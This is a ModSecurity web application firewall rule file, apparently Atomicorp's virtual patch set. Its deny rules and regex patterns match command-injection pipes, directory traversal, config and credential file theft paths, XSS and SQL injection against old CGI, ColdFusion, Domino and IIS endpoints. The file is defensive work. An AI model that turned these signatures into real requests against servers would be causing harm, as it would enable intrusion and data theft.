#SecRule REQUEST_URI "/book\.f?cgi.*current=.*7c" # "id:310213,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: book.cgi arbitrary command execution attempt'"
# Rule 310250: include cgi command exec
SecRule REQUEST_URI "/includer\.f?cgi\?=\|" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310250,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: includer.cgi command execution attempt'"
# Rule 310265: proxy grabber
SecRule REQUEST_URI "/proxy-grabber\.com/cgi-bin/v2/nph-env\.f?cgi\?" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310265,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Proxy Grabber nph-env.cgi access attempt'"
# Rule 310301: ads.cgi command execution attempt
SecRule REQUEST_URI "/ads\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:310301,rev:2,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ads.cgi local command execution attempt'"
SecRule ARGS:file "\.\./\.\./"
# Rule 310302: webdist.cgi arbitrary command attemp
#SecRule REQUEST_URI "/webdist\.f?cgi.*distloc=.*3b" # "id:310302,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: webdist.cgi local command execution attempt'"
# Rule 310303: enter_bug.cgi arbitrary command attempt
#SecRule REQUEST_URI "/enter_bug\.f?cgi.*who.*3b" # "id:310303,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: enter_bug.cgi local command execution attempt'"
#SecRule REQUEST_URI "/index\.f?cgi\?action=.*&cat=.*&art=.*\|" # "id:310459,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: E-Cart index.cgi local command execution attempt'"
# Rule 310019: Agora CGI Cross Site Scripting
# CVE: "CVE-2001-1199"
SecRule REQUEST_URI "/store/agora\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:310484,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Agora CGI Cross Site Scripting'"
SecRule ARGS:cart_id "(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310019: cpanel remote command execution
SecRule REQUEST_URI "/cgi-sys/guestbook\.f?cgi\?user=cpanel&template=\|" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310486,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: cpanel remote command execution'"
# Rule 310019: Zeus Admin Interface XSS
SecRule REQUEST_URI "/apps/web/vs_diag\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:310488,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Zeus Admin Interface XSS'"
SecRule ARGS:server "(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310019: main.cgi directory traversal and file access
#SecRule REQUEST_URI "/main\.f?cgi\?next_file=*/" # "id:310490,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: main.cgi directory traversal and file access'"
# Rule 310019: pdesk directory traversal and file theft
SecRule REQUEST_URI "/cgi-bin/pdesk\.f?cgi\?lang=(?:\.\./\.\./|/etc|/tmp|/home|/var)" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310593,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: pdesk directory traversal and file theft'"
# Rule 310019: WebAPP Cross-Site Scripting Vulnerabilities
SecRule REQUEST_URI "index\.cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:390014,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: aWebAPP XSS attack'"
SecRule ARGS:action|ARGS:id|ARGS:num|ARGS:board|ARGS:cat|ARGS:writer|ARGS:viewcat|ARGS:img|ARGS:curcatname|ARGS:vsSD "(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310019: Cholod Mysql based message board Script Insertion and SQL Injection
SecRule REQUEST_URI "/mb\.cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:390026,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: X-Changer XSS Vulnerability'"
SecRule ARGS:Name|ARGS:Subject|ARGS:Message "(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310019: Censtore.cgi exploit
SecRule REQUEST_URI "/censtore\.cgi\?page=\|" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:390042,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Censtore.cgi exploit'"
# Rule 310019: Censtore.cgi exploit
SecRule REQUEST_URI "/test\.f?cgi" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:393134,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Test.fcgi or test.cgi access'"
SecMarker END_CGI_JITP
#Shell applications
SecRule REQUEST_FILENAME "@endswith .sh" "id:333876,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309010,t:none,pass,nolog,noauditlog,skipAfter:END_SHELL_JITP"
# Rule 310107: bb-hist.sh attempt
SecRule REQUEST_URI "/bb-hist\.sh\?histfile=\.\./\.\." "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310107,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: bb-hist.sh directory traversal attempt'"
# Rule 310108: bb-hostscv.sh attempt
SecRule REQUEST_URI "/bb-hostsvc\.sh\?hostsvc\?\.\./\.\." "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310108,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: bb-hostscv.sh attempt'"
SecMarker END_SHELL_JITP
#Batch File applications
SecRule REQUEST_FILENAME "\.bat" "id:333877,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309011,t:none,pass,nolog,noauditlog,skipAfter:END_BATCH_JITP"
# Rule 310023: hello.bat arbitrary command execution attempt
SecRule REQUEST_URI "/hello\.bat" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310023,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: hello.bat arbitrary command execution attempt',chain"
SecRule REQUEST_URI "\&"
# Rule 310123: test.bat arbitrary command execution attempt
SecRule REQUEST_URI "/test.bat(?:\|7c\||\x7c)" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310123,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: test.bat arbitrary command execution attempt'"
# Rule 310124: input.bat arbitrary command execution attempt
SecRule REQUEST_URI "/input.bat(?:\|7c\||\x7c)" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310124,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: input.bat arbitrary command execution attempt'"
# Rule 310125: envout.bat arbitrary command execution attempt
SecRule REQUEST_URI "/envout.bat(?:\|7c\||\x7c)" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310125,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: envout.bat arbitrary command execution attempt'"
# Rule 310126: hello.bat arbitrary command execution attempt
SecRule REQUEST_URI "/hello\.bat" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310126,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: hello.bat arbitrary command execution attempt',chain"
SecRule REQUEST_URI "\&"
# Rule 310019: Apache Remote Command Execution via .bat files
# CVE: "CVE-2002-0061"
SecRule REQUEST_URI "/test-cgi\.bat\?\|" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310485,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Apache Remote Command Execution via .bat files'"
SecMarker END_BATCH_JITP
#Coldfusion applications
SecRule REQUEST_URI "\.(cfm|map)" "id:333878,phase:2,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:replaceNulls,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309012,t:none,pass,nolog,noauditlog,skipAfter:END_COLDFUSION_JITP"
# Rule 310155: exampleapp application.cfm
SecRule REQUEST_URI "/cfdocs/exampleapp/email/application\.cfm" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310155,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coldfusion exampleapp e-mail application.cfm access attempt'"
# Rule 310156: application.cfm access
SecRule REQUEST_URI "/cfdocs/exampleapp/publish/admin/application\.cfm" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310156,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coldfusion exampleapp publisher application.cfm access attempt'"
# Rule 310157: getfile.cfm access
SecRule REQUEST_URI "/cfdocs/exampleapp/email/getfile\.cfm" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310157,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coldfusion exampleapp e-mail getfile.cfm access attempt'"
# Rule 310158: addcontent.cfm access
SecRule REQUEST_URI "/cfdocs/exampleapp/publish/admin/addcontent\.cfm" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310158,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coldfusion exampleapp addcontent.cfm access attempt'"
# Rule 310159: administrator access
#SecRule REQUEST_URI "/cfide/administrator/index\.cfm" # "id:310159,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coldfusion administrator access attempt'"
#
# Rule 310160: fileexists.cfm access
SecRule REQUEST_URI "/cfdocs/snippets/fileexists\.cfm" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310160,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coldfusion fileexists.cfm access attempt'"
# Rule 310161: exprcalc access
SecRule REQUEST_URI "/cfdocs/expeval/exprcalc\.cfm" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310161,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coldfusion expercalc.cfm access attempt'"
# Rule 310162: parks access
SecRule REQUEST_URI "/cfdocs/examples/parks/detail\.cfm" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310162,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coldfusion parks detail.cfm access attempt'"
# Rule 310163: cfappman access
SecRule REQUEST_URI "/cfappman/index\.cfm" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310163,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coldfusion cfappman index.cfm access attempt'"
# Rule 310164: beaninfo access
SecRule REQUEST_URI "/cfdocs/examples/cvbeans/beaninfo\.cfm" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310164,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coldfusion beaninfo.cfm access attempt'"
# Rule 310165: evaluate.cfm access
SecRule REQUEST_URI "/cfdocs/snippets/evaluate\.cfm" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310165,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coldfusion evaluate.cfm access attempt'"
# Rule 310166: expeval access
SecRule REQUEST_URI "/cfdocs/expeval/" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310166,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coldfusion expeval access attempt'"
# Rule 310167: displayfile access
SecRule REQUEST_URI "/cfdocs/expeval/displayopenedfile\.cfm" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310167,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coldfusion displayfile access attempt'"
# Rule 310168: mainframeset access
SecRule REQUEST_URI "/cfdocs/examples/mainframeset\.cfm" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310168,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coldfusion mainframeset.cfm access attempt'"
# Rule 310171: cfmlsyntaxcheck.cfm access
SecRule REQUEST_URI "/cfdocs/cfmlsyntaxcheck\.cfm" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310171,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coldfusion cfmlsyntaxcheck.cfm access attempt'"
# Rule 310172: application.cfm access
SecRule REQUEST_URI "/application\.cfm" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310172,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coldfusion application.cfm direct access attempt'"
# Rule 310173: onrequestend.cfm access
SecRule REQUEST_URI "/onrequestend\.cfm" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310173,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coldfusion onrequestend.cfm direct access attempt'"
# Rule 310174: startstop.cfm DoS access attempt
SecRule REQUEST_URI "/cfide/administrator/startstop\.html" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310174,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coldfusion startstop.cfm DoS attempt'"
# Rule 310175: gettempdirectory.cfm access
SecRule REQUEST_URI "/cfdocs/snippets/gettempdirectory\.cfm" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310175,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coldfusion gettempdirectory.cfm direct access attempt'"
# Rule 310176: sendmail.cfm access
SecRule REQUEST_URI "/sendmail\.cfm" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310176,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coldfusion sendmail.cfm direct access attempt'"
# Rule 310154: cfcache.map access
SecRule REQUEST_URI "/cfcache\.map" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310154,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Coldfusion cfcache.map file access attempt'"
SecMarker END_COLDFUSION_JITP
#Domino applications
SecRule REQUEST_FILENAME "@endswith .nsf" "id:333879,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309013,t:none,pass,nolog,noauditlog,skipAfter:END_DOMINO_JITP"
# Rule 310185: Domino catalog.nsf access
SecRule REQUEST_URI "/catalog\.nsf" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310185,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Domino catalog.nsf access attempt'"
# Rule 310186: Domino domcfg.nsf access
SecRule REQUEST_URI "/domcfg\.nsf" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310186,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Domino domcfg.nsf access attempt'"
# Rule 310187: Domino domlog.nsf access
SecRule REQUEST_URI "/domlog\.nsf" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310187,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Domino domlog.nsf access attempt'"
# Rule 310188: Domino log.nsf access
SecRule REQUEST_URI "/log\.nsf" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310188,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Domino log.nsf access attempt'"
# Rule 310189: Domino names.nsf access
SecRule REQUEST_URI "/names\.nsf" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310189,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Domino names.nsf access attempt'"
# Rule 310190: Domino mab.nsf access
SecRule REQUEST_URI "/mab\.nsf" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310190,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Domino mab.nsf access attempt'"
# Rule 310191: Domino cersvr.nsf access
SecRule REQUEST_URI "/cersvr\.nsf" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310191,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Domino cersvr.nsf access attempt'"
# Rule 310192: Domino setup.nsf access
SecRule REQUEST_URI "/setup\.nsf" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310192,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Domino setup.nsf access attempt'"
# Rule 310193: Domino statrep.nsf access
SecRule REQUEST_URI "/statrep\.nsf" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310193,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Domino statrep.nsf access attempt'"
# Rule 310194: Domino webadmin.nsf access
SecRule REQUEST_URI "/webadmin\.nsf" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310194,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Domino webadmin.nsf access attempt'"
# Rule 310195: Domino events4.nsf access
SecRule REQUEST_URI "/events4\.nsf" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310195,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Domino events4.nsf access attempt'"
# Rule 310196: Domino ntsync4.nsf access
SecRule REQUEST_URI "/ntsync4\.nsf" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310196,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Domino ntsync4.nsf access attempt'"
# Rule 310197: Domino collect4.nsf access
SecRule REQUEST_URI "/collect4\.nsf" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310197,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Domino collect4.nsf access attempt'"
# Rule 310198: Domino mailw46.nsf access
SecRule REQUEST_URI "/mailw46\.nsf" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310198,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Domino mailw46.nsf access attempt'"
# Rule 310199: Domino bookmark.nsf access
SecRule REQUEST_URI "/bookmark\.nsf" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310199,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Domino bookmark.nsf access attempt'"
# Rule 310200: Domino agentrunner.nsf access
SecRule REQUEST_URI "/agentrunner\.nsf" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310200,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Domino agentrunner.nsf access attempt'"
SecMarker END_DOMINO_JITP
#exe attacks
SecRule REQUEST_FILENAME "@endswith .exe" "id:333880,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309014,t:none,pass,nolog,noauditlog,skipAfter:END_EXE_JITP"
# Rule 310101: imagemap.exe overflow attempt
SecRule REQUEST_URI "/imagemap\.exe\?" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310101,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: imagemap.exe overflow attempt'"
# Rule 310180: Talentsoft Web+ Source Code view access
SecRule REQUEST_URI "/webplus\.exe\?script=test\.wml" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310180,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Talentsoft Web+ source code access attempt'"
SecMarker END_EXE_JITP
#dll attacks
SecRule REQUEST_FILENAME "\.dll" "id:333881,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309015,t:none,pass,nolog,noauditlog,skipAfter:END_DLL_JITP"
# Rule 310226:webdav search attack
SecRule REQUEST_URI "/_vti_bin/(?:_vti_(?:aut|adm)/(?:fp30reg|author|dvwssr|admin)|shtml)\.dll" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310226,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Microsoft Frontpage exploit attempt'"
# Rule 310728:/pbserver/pbserver.dll
SecRule REQUEST_URI "/pbserver/pbserver\.dll" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310728,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: /pbserver/pbserver.dll exploit attempt'"
# Rule 310729:/iiswebagentif.dll
SecRule REQUEST_URI "/iiswebagentif\.dll" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310529,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: /iiswebagentif.dll exploit attempt'"
# Rule 310709: /fsms/fsmsh.dll
SecRule REQUEST_URI "/fsms/fsmsh\.dll" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310709,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: /fsms/fsmsh.dll exploit attempt'"
# Rule 310710: /msadc/msadcs.dll
SecRule REQUEST_URI "/msadc/msadcs\.dll" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310710,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: /msadc/msadcs.dll exploit attempt'"
# Rule 310711: /isapi/tstisapi.dll
SecRule REQUEST_URI "/isapi/tstisapi\.dll" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310711,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: /isapi/tstisapi.dll exploit attempt'"
# Rule 310711: /webadmin.dll
SecRule REQUEST_URI "/webadmin\.dll" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310712,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: /webadmin.dll exploit attempt'"
SecMarker END_DLL_JITP
#xml attacks
SecRule REQUEST_FILENAME "@endswith .xml" "id:333882,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309016,t:none,pass,nolog,noauditlog,skipAfter:END_XML_JITP"
#Moved from embargoed rules
SecRule REQUEST_URI "/swip/upd/solarwinds\.cortexplugin\.components\.xml" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:340000,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Solarwinds backdoor attempt'"
SecRule REQUEST_URI "/swip/(?:events|upload|upd)" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:340001,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Solarwinds backdoor attempt'"
# Rule 310729: Oracle SQL config theft attempt
SecRule REQUEST_URI "xsql/lib/xsqlconfig\.xml" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310729,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Oracle SQL config theft attempt'"
# Rule 310713: soapconfig.xml theft
SecRule REQUEST_URI "/soapdocs/webapps/soap/web-inf/config/soapconfig\.xml" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310713,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Java App Server SOAP config theft attempt'"
# Rule 310714: /nps/packages/iman_mod_desc.xml theft
SecRule REQUEST_URI "/nps/packages/iman_mod_desc\.xml" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310714,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Java App Server SOAP config theft attempt'"
#dwsync.xml
SecRule REQUEST_URI "a_notes/dwsync\.xml" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:310715,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Dreamweaver Information Disclosure'"
SecMarker END_XML_JITP
#.inc files attacks
SecRule REQUEST_FILENAME "@endswith .inc" "id:333883,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309017,t:none,pass,nolog,noauditlog,skipAfter:END_INC_JITP"
# Rule 310207: PCCS mysql database admin tool access
SecRule REQUEST_URI "pccsmysqladm/incs/dbconnect\.inc" "id:310207,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PCCS MySQL database admin tool access attempt'"
# Rule 310218: myphpPagetool pt_config.inc file include
SecRule REQUEST_URI "/doc/admin" "id:310218,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: : myphpPagetool pt_config.inc file inclusion attempt',chain"
SecRule REQUEST_URI "pt_config\.inc"
# Rule 310012: WEB-PHP phplib remote command attempt
SecRule REQUEST_URI "/db_mysql\.inc" "id:310012,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phplib remote command attempt'"
# Rule 310074:myphpPagetool pt_config.inc file include
SecRule REQUEST_URI "/doc/admin*ptinclude*pt_config\.inc" "id:310074,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Pagetool pt_config.inc file include'"
SecMarker END_INC_JITP
#html attacks
SecRule REQUEST_FILENAME "\.p?html?$" "id:333884,phase:2,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309018,t:none,pass,nolog,noauditlog,skipAfter:END_HTML_JITP"
#/genericons/example.html
SecRule REQUEST_URI "/genericons/example\.html" "phase:2,capture,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:336479,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress DOM XSS Attack',logdata:'%{TX.0}'"
# Rule 310087: TIKIWIKI
SecRule REQUEST_URI "/tiki-map.p?html\?mapfile=\.\./\.\./" "id:310087,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TikiWiki directory traversal'"
# Rule 310183: Tomcat server exploit access
SecRule REQUEST_URI "/contextadmin/contextadmin\.html" "id:310183,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: tomcat contextAdmin exploit attempt'"
# Rule 310019: 12Planet Chat Server Path Disclosure
# CVE: "CVE-MAP-NOMATCH"
SecRule REQUEST_URI "/qwe/qwe/index\.html" "id:310483,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: 12Planet Chat Server Path Disclosure'"
# Rule 310019: Interchange Catalog Skeleton SQL Injection and ITL Injection Vulnerabilities
SecRule REQUEST_URI "/forum/submit\.html" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390489,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Interchange Catalog Skeleton SQL Injection and ITL Injection Vulnerabilities'"
SecRule REQUEST_URI "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\[include\])"
# Rule 310019: Nephp Publisher SQL Injection Vulnerabilities
